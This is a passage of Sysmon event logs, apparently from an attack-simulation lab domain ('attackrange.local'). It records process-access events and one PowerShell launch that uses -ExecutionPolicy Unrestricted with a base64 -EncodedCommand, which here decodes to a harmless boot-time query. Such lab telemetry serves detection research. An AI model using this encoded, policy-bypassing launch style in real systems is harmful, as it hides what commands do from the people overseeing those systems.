C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-108F-5F25-0000-001040B60400}","SourceProcessId":"4612","SourceThreadId":"4632","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001083B80400}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.012\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nProcessId: 4688\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-108F-5F25-0000-002089B50400}\r\nLogonId: 0x4B589\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nParentProcessId: 4676\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.012","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-108F-5F25-0000-002089B50400}","LogonId":"0x4b589","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-1090-5F25-0000-001083B80400}","ParentProcessId":"4676","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nSourceProcessId: 4676\r\nSourceThreadId: 4680\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001083B80400}","SourceProcessId":"4676","SourceThreadId":"4680","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
